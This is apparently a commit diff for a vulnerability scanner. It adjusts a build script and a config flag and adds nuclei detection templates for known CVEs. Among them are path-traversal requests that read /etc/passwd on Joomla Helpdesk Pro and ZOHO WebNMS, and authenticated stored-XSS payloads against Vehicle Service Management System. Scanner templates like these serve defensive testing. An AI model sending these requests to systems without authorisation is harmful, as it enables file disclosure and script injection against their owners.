up PoCs, nuclei to 2.7.7 2022-09-02

.github/up.sh

@@ -25,7 +25,7 @@ go vet
 #cat ./pkg/fingerprint/dicts/eHoleFinger.json|jq ".fingerprint[].cms"|wc -l
 #cat ./pkg/fingerprint/dicts/localFinger.json|jq ".fingerprint[].cms"|wc -l
 #cat ./pkg/fingerprint/dicts/fg.json|jq ".[].kind"|wc -l
-git add config/nuclei-templates pocs_yml/ymlFiles
+git add config/nuclei-templates pocs_yml/ymlFiles vendor
 git add vendor
 git status
 go build

config/config.json

@@ -66,7 +66,7 @@
   "KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$",
   "naabu_dns": {},
   "naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false},
-  "priorityNmap": true,
+  "priorityNmap": false,
   "noScan": false,
   "enableMultNuclei": false,
   "enableNuclei": true,

config/nuclei-templates/cves/2015/CVE-2015-4074.yaml

@@ -0,0 +1,33 @@
+id: CVE-2015-4074
+info:
+  name: Joomla Helpdesk Pro plugin before 1.4.0 - Local File Disclosure
+  author: 0x_Akoko
+  severity: high
+  description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
+  reference:
+    - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
+    - https://www.exploit-db.com/exploits/37666/
+    - https://www.cvedetails.com/cve/CVE-2015-4074
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-4074
+    cwe-id: CWE-22
+  tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2016/CVE-2016-6601.yaml

@@ -0,0 +1,32 @@
+id: CVE-2016-6601
+
+info:
+  name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
+  reference:
+    - https://www.cvedetails.com/cve/CVE-2016-6601
+    - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
+    - https://www.exploit-db.com/exploits/40229/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2016-6601
+    cwe-id: CWE-22
+  tags: cve,cve2016,zoho,lfi,webnms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2021/CVE-2021-46068.yaml

@@ -1,40 +1,42 @@
 id: CVE-2021-46068
 
-info:
-  name: Vehicle Service Management System - Stored Cross Site Scripting
-  author: TenBird
-  severity: medium
-  description: |
-    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
-  reference:
-    - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
-    - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
-    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-46068
-  classification:
-    cve-id: CVE-2021-46068
-  metadata:
-    verified: true
-  tags: cve,cve2021,xss,vms,authenticated
-
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46068
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46068
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
 requests:
   - raw:
       - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         username={{username}}&password={{password}}
 
       - |
-        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
+        POST /classes/Users.php?f=save HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
 
       - |
-        GET /vehicle_service/admin/?page=user HTTP/1.1
+        GET /admin/?page=user HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true

config/nuclei-templates/cves/2021/CVE-2021-46069.yaml

@@ -1,42 +1,42 @@
 id: CVE-2021-46069
 
-info:
-  name: Vehicle Service Management System - Stored Cross Site Scripting
-  author: TenBird
-  severity: medium
-  description: |
-    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
-  reference:
-    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
-    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
-    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 4.8
-    cve-id: CVE-2021-46069
-    cwe-id: CWE-79
-  metadata:
-    verified: "true"
-  tags: cve,cve2021,xss,vms,authenticated
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46069
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
 requests:
   - raw:
       - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         username={{username}}&password={{password}}
 
       - |
-        POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1
+        POST /classes/Master.php?f=save_mechanic HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
 
       - |
-        GET /vehicle_service/admin/?page=mechanics HTTP/1.1
+        GET /admin/?page=mechanics HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true

config/nuclei-templates/cves/2021/CVE-2021-46071.yaml

@@ -1,40 +1,42 @@
 id: CVE-2021-46071
 
-info:
-  name: Vehicle Service Management System - Stored Cross Site Scripting
-  author: TenBird
-  severity: medium
-  description: |
-    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.
-  reference:
-    - https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
-    - https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
-    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-46071
-  classification:
-    cve-id: CVE-2021-46071
-  metadata:
-    verified: true
-  tags: cve,cve2021,xss,vms,authenticated
-
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46071
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46071
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
 requests:
   - raw:
       - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         username={{username}}&password={{password}}
 
       - |
-        POST /vehicle_service/classes/Master.php?f=save_category HTTP/1.1
+        POST /classes/Master.php?f=save_category HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
 
       - |
-        GET /vehicle_service/admin/?page=maintenance/category HTTP/1.1
+        GET /admin/?page=maintenance/category HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true

config/nuclei-templates/cves/2021/CVE-2021-46072.yaml

@@ -1,40 +1,42 @@
 id: CVE-2021-46072
 
-info:
-  name: Vehicle Service Management System - Stored Cross Site Scripting
-  author: TenBird
-  severity: medium
-  description: |
-    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
-  reference:
-    - https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS
-    - https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
-    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-46072
-  classification:
-    cve-id: CVE-2021-46072
-  metadata:
-    verified: true
-  tags: cve,cve2021,xss,vms,authenticated
-
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46072
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46072
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
 requests:
   - raw:
       - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         username={{username}}&password={{password}}
 
       - |
-        POST /vehicle_service/classes/Master.php?f=save_service HTTP/1.1
+        POST /classes/Master.php?f=save_service HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
 
       - |
-        GET /vehicle_service/admin/?page=maintenance/services HTTP/1.1
+        GET /admin/?page=maintenance/services HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true

config/nuclei-templates/cves/2021/CVE-2021-46073.yaml

@@ -0,0 +1,53 @@
+id: CVE-2021-46073
+
+info:
+  name: Vehicle Service Management System - Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46073
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46073
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+requests:
+  - raw:
+      - |
+        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
+
+      - |
+        GET /vehicle_service/admin/?page=user/list HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
+        condition: and